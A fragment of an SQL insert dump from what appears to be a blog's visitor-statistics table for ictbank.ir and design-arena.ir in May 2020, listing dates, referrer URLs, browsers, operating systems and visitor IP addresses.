(2397,'2020-05-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2398,'2020-05-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2399,'2020-05-10','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,3,0),
(2400,'2020-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.71.202','000',0,1,0),
(2401,'2020-05-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.89.64.48','000',0,2,0),
(2402,'2020-05-11','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','82.117.194.229','000',0,2,0),
(2403,'2020-05-11','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','176.31.244.49','000',0,2,0),
(2404,'2020-05-11','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','154.113.16.226','000',0,3,0),
(2405,'2020-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.161.1.188','000',0,1,0),
(2406,'2020-05-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,6,0),
(2407,'2020-05-11','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','140.143.16.158','000',0,1,0),
(2408,'2020-05-11','http://82.102.9.14:80/blog','Firefox','Windows','6.0',NULL,NULL,'','121.201.34.11','000',0,1,0),
(2409,'2020-05-11','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','212.33.236.217','000',0,1,0),
(2410,'2020-05-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','54.190.161.47','000',0,1,0),
(2411,'2020-05-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','178.46.136.122','000',0,1,0),
(2412,'2020-05-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','60.174.92.50','000',0,1,0),
(2413,'2020-05-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','218.28.164.218','000',0,1,0),
(2414,'2020-05-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','14.17.70.179','000',0,1,0),
(2415,'2020-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.39.113','000',0,1,0),
(2416,'2020-05-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.195.146.140','000',0,1,0),
(2417,'2020-05-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2418,'2020-05-11','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','82.146.54.216','000',0,5,0),
(2419,'2020-05-11','http://www.ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','46.4.167.153','000',0,2,0),
(2420,'2020-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.152.103','000',0,1,0),
(2421,'2020-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.27.59.4','000',0,1,0),
(2422,'2020-05-12','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','90.154.102.15','000',0,1,0),
(2423,'2020-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.116.93','000',0,1,0),
(2424,'2020-05-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,6,0),
(2425,'2020-05-12','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','128.199.53.185','000',0,1,0),
(2426,'2020-05-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','121.33.219.162','000',0,1,0),
(2427,'2020-05-12','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','88.198.205.13','000',0,2,0),
(2428,'2020-05-12','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','51.38.115.166','000',0,2,0),
(2429,'2020-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.216.60','000',0,1,0),
(2430,'2020-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.143.3','000',0,1,0),
(2431,'2020-05-12','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','115.239.244.198','000',0,1,0),
(2432,'2020-05-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(2433,'2020-05-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.213.202','000',0,1,0),
(2434,'2020-05-12','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(2435,'2020-05-13','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','121.43.235.134','000',0,1,0),
(2436,'2020-05-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','124.164.235.209','000',0,1,0),
(2437,'2020-05-13','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.183.226','000',0,1,0),
(2438,'2020-05-13','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.25.79.208','000',0,3,0),
(2439,'2020-05-13','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','66.240.236.119','000',0,1,0),
(2440,'2020-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.25.244','000',0,1,0),
(2441,'2020-05-13','google.com','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(2442,'2020-05-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','61.191.130.198','000',0,1,0),
(2443,'2020-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.71.9.28','000',0,1,0),
(2444,'2020-05-13','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','213.248.241.182','000',0,1,0),
(2445,'2020-05-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2446,'2020-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.135.17','000',0,1,0),
(2447,'2020-05-13','http://ictbank.ir/blog','QQ Browser','Windows','6.1',NULL,NULL,'','212.227.192.220','000',0,1,0),
(2448,'2020-05-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.217.194','000',0,1,0),
(2449,'2020-05-13','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','199.244.88.132','000',0,1,0),
(2450,'2020-05-13','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.234.218.174','000',0,1,0),
(2451,'2020-05-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(2452,'2020-05-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','1.177.191.161','000',0,1,0),
(2453,'2020-05-13','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','62.109.5.228','000',0,1,0),
(2454,'2020-05-13','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(2455,'2020-05-13','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','60.194.6.9','000',0,1,0),
(2456,'2020-05-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','222.252.16.71','000',0,1,0),
(2457,'2020-05-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','59.29.238.123','000',0,1,0),
(2458,'2020-05-14','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','35.164.192.152','000',0,1,0),
(2459,'2020-05-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(2460,'2020-05-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.179.209','000',0,1,0),
(2461,'2020-05-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,3,0),
(2462,'2020-05-14','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','185.220.101.13','000',0,1,0),
(2463,'2020-05-14','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','5.62.51.88','000',0,1,0),
(2464,'2020-05-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.193.30','000',0,1,0),
(2465,'2020-05-14','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','51.15.177.65','000',0,1,0),
(2466,'2020-05-14','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','34.217.69.225','000',0,1,0),
(2467,'2020-05-14','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.143.158.82','000',0,1,0),
(2468,'2020-05-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.100.83','000',0,1,0),
(2469,'2020-05-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','200.146.227.146','000',0,1,0),
(2470,'2020-05-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.103.178','000',0,1,0),
(2471,'2020-05-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(2472,'2020-05-14','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','183.234.36.42','000',0,1,0),
(2473,'2020-05-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2474,'2020-05-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,1,0),
(2475,'2020-05-14','http://ictbank.ir/blog/','Opera','Windows','6.1',NULL,NULL,'','95.165.95.233','000',0,4,0),
(2476,'2020-05-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(2477,'2020-05-15','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','51.79.86.177','000',0,1,0),
(2478,'2020-05-15','http://mail.design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.89.201.15','000',0,1,0),
(2479,'2020-05-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.64.104.10','000',0,1,0),
(2480,'2020-05-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','218.83.246.141','000',0,1,0),
(2481,'2020-05-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,6,0),
(2482,'2020-05-15','http://design-arena.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','212.227.192.220','000',0,1,0),
(2483,'2020-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.123.232.218','000',0,1,0),
(2484,'2020-05-15','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','185.220.101.213','000',0,1,0),
(2485,'2020-05-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(2486,'2020-05-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','221.176.134.36','000',0,1,0),
(2487,'2020-05-15','http://ictbank.ir/blog','Firefox','Fedora','Unknown',NULL,NULL,'','79.127.96.129','000',0,2,0),
(2488,'2020-05-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2489,'2020-05-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','13.68.133.164','000',0,1,0),
(2490,'2020-05-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','62.173.139.191','000',0,1,0),
(2491,'2020-05-15','http://ictbank.ir/blog','Unknown','Android','4.4.2',NULL,NULL,'','2.147.157.235','000',0,1,0),
(2492,'2020-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.114.195','000',0,1,0),
(2493,'2020-05-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.132.203','000',0,1,0),
(2494,'2020-05-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','82.4.4.55','000',0,4,0),
(2495,'2020-05-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(2496,'2020-05-15','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','18.27.197.252','000',0,1,0),
(2497,'2020-05-15','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','178.17.170.110','000',0,1,0),
(2498,'2020-05-15','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(2499,'2020-05-16','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','45.136.108.89','000',0,1,0),
(2500,'2020-05-16','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','41.67.16.83','000',0,3,0),
(2501,'2020-05-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,6,0),
(2502,'2020-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.11.133.233','000',0,1,0),
(2503,'2020-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.124.209.42','000',0,1,0),
(2504,'2020-05-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(2505,'2020-05-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','159.203.32.136','000',0,1,0),
(2506,'2020-05-16','http://ictbank.ir/blog','Unknown','Android','4.4.2',NULL,NULL,'','2.147.178.102','000',0,1,0),
(2507,'2020-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.127.92','000',0,1,0),
(2508,'2020-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.119.53','000',0,1,0),
(2509,'2020-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','120.211.145.98','000',0,1,0),
(2510,'2020-05-16','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','128.199.194.131','000',0,1,0),
(2511,'2020-05-16','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','159.203.182.52','000',0,2,0),
(2512,'2020-05-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,1,0),
(2513,'2020-05-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.191.145','000',0,1,0),
(2514,'2020-05-16','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.89.201.9','000',0,1,0),
(2515,'2020-05-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2516,'2020-05-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,1,0),
(2517,'2020-05-17','http://design-arena.ir/blog','Chrome','Android','5.1.1',NULL,NULL,'','51.89.201.9','000',0,2,0),
(2518,'2020-05-17','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','91.121.171.148','000',0,1,0),
(2519,'2020-05-17','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','176.31.244.49','000',0,2,0),
(2520,'2020-05-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.121','000',0,3,0),
(2521,'2020-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.53.231','000',0,1,0),
(2522,'2020-05-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2523,'2020-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.251.223','000',0,1,0),
(2524,'2020-05-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.137.202.121','000',0,1,0),
(2525,'2020-05-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.40.191.115','000',0,3,0),
(2526,'2020-05-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(2527,'2020-05-17','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','39.129.128.245','000',0,2,0),
(2528,'2020-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.163.126.97','000',0,1,0),
(2529,'2020-05-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.127.69.113','000',0,1,0),
(2530,'2020-05-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(2531,'2020-05-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','80.82.68.113','000',0,1,0),
(2532,'2020-05-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.123','000',0,3,0),
(2533,'2020-05-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.99.216.112','000',0,1,0),
(2534,'2020-05-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','220.162.158.2','000',0,1,0),
(2535,'2020-05-18','http://design-arena.ir/blog/','Opera','Windows','10.0',NULL,NULL,'','37.115.223.45','000',0,1,0),
(2536,'2020-05-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2537,'2020-05-18','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.52.254','000',0,1,0),
(2538,'2020-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','113.128.105.88','000',0,1,0),
(2539,'2020-05-18','http://mail.design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','34.72.227.196','000',0,1,0),
(2540,'2020-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.159.37.103','000',0,1,0),
(2541,'2020-05-18','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','185.220.101.131','000',0,1,0),
(2542,'2020-05-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','184.154.189.90','000',0,1,0),
(2543,'2020-05-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.234.217.172','000',0,1,0),
(2544,'2020-05-18','http://design-arena.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','167.99.97.137','000',0,1,0),
(2545,'2020-05-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','189.59.5.49','000',0,1,0),
(2546,'2020-05-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,1,0),
(2547,'2020-05-18','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','185.220.100.251','000',0,1,0),
(2548,'2020-05-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','116.171.0.59','000',0,1,0),
(2549,'2020-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.36.89.120','000',0,1,0),
(2550,'2020-05-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.123','000',0,3,0),
(2551,'2020-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.11.102.117','000',0,1,0),
(2552,'2020-05-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','37.49.226.252','000',0,1,0),
(2553,'2020-05-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','132.145.101.73','000',0,1,0),
(2554,'2020-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.236.142','000',0,1,0),
(2555,'2020-05-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','202.99.199.142','000',0,1,0),
(2556,'2020-05-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(2557,'2020-05-18','http://ictbank.ir/blog','Firefox Mobile','Android','Unknown',NULL,NULL,'','180.97.215.22','000',0,1,0),
(2558,'2020-05-18','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','82.102.13.201','000',0,1,0),
(2559,'2020-05-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','61.148.196.114','000',0,1,0),
(2560,'2020-05-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.102.219.69','000',0,1,0),
(2561,'2020-05-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','115.84.91.211','000',0,1,0),
(2562,'2020-05-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2563,'2020-05-19','http://mail.design-arena.ir/blog','Chrome','Android','5.1.1',NULL,NULL,'','35.188.148.93','000',0,2,0),
(2564,'2020-05-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','222.175.49.22','000',0,1,0),
(2565,'2020-05-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','197.50.129.44','000',0,1,0),
(2566,'2020-05-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','222.87.54.4','000',0,1,0),
(2567,'2020-05-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','112.27.128.13','000',0,1,0),
(2568,'2020-05-19','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','104.245.38.209','000',0,1,0),
(2569,'2020-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.172.253','000',0,1,0),
(2570,'2020-05-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','183.60.136.10','000',0,1,0),
(2571,'2020-05-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','58.215.198.2','000',0,2,0),
(2572,'2020-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.39.240.81','000',0,1,0),
(2573,'2020-05-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.234.219.133','000',0,1,0),
(2574,'2020-05-19','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(2575,'2020-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.120.240','000',0,1,0),
(2576,'2020-05-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.59.219.245','000',0,1,0),
(2577,'2020-05-19','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.129.4','000',0,2,0),
(2578,'2020-05-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2579,'2020-05-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','118.27.16.93','000',0,1,0),
(2580,'2020-05-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','67.205.164.1','000',0,1,0),
(2581,'2020-05-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','195.62.46.45','000',0,1,0),
(2582,'2020-05-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.123','000',0,6,0),
(2583,'2020-05-20','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','90.154.102.15','000',0,1,0),
(2584,'2020-05-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(2585,'2020-05-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(2586,'2020-05-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,1,0),
(2587,'2020-05-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','218.22.235.138','000',0,1,0),
(2588,'2020-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.157.192','000',0,1,0),
(2589,'2020-05-20','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.226','000',0,1,0),
(2590,'2020-05-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','5.101.0.209','000',0,3,0),
(2591,'2020-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.226.57','000',0,1,0),
(2592,'2020-05-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','45.144.64.98','000',0,1,0),
(2593,'2020-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.42.162.91','000',0,1,0),
(2594,'2020-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.120.116.37','000',0,1,0),
(2595,'2020-05-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','18.130.29.115','000',0,1,0),
(2596,'2020-05-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.83.78','000',0,1,0),
(2597,'2020-05-20','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','37.231.160.114','000',0,1,0),
(2598,'2020-05-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.123','000',0,6,0),
(2599,'2020-05-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.93.217.108','000',0,1,0),
(2600,'2020-05-21','http://ictbank.ir/blog','Chrome','OS X','10.12.5',NULL,NULL,'','181.214.113.183','000',0,1,0),
(2601,'2020-05-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','111.13.67.183','000',0,3,0),
(2602,'2020-05-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','150.136.192.92','000',0,3,0),
(2603,'2020-05-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.209.201','000',0,1,0),
(2604,'2020-05-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','221.199.41.218','000',0,1,0),
(2605,'2020-05-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.241.94','000',0,1,0),
(2606,'2020-05-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','222.218.248.42','000',0,1,0),
(2607,'2020-05-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','24.15.211.199','000',0,1,0),
(2608,'2020-05-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(2609,'2020-05-21','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','141.98.10.142','000',0,1,0),
(2610,'2020-05-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.250.55','000',0,1,0),
(2611,'2020-05-21','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','91.121.76.25','000',0,1,0),
(2612,'2020-05-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.235.9','000',0,1,0),
(2613,'2020-05-21','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.89.201.9','000',0,1,0),
(2614,'2020-05-22','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','3.124.195.72','000',0,1,0),
(2615,'2020-05-22','http://ictbank.ir/blog','Chrome','Android','5.1.1',NULL,NULL,'','51.89.201.9','000',0,2,0),
(2616,'2020-05-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.55.146','000',0,1,0),
(2617,'2020-05-22','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(2618,'2020-05-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.156.114','000',0,1,0),
(2619,'2020-05-22','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','112.66.97.221','000',0,1,0),
(2620,'2020-05-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.212.192','000',0,1,0),
(2621,'2020-05-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.123','000',0,3,0),
(2622,'2020-05-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(2623,'2020-05-22','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','150.249.214.249','000',0,1,0),
(2624,'2020-05-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.216.179','000',0,1,0),
(2625,'2020-05-22','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','86.135.191.89','000',0,1,0),
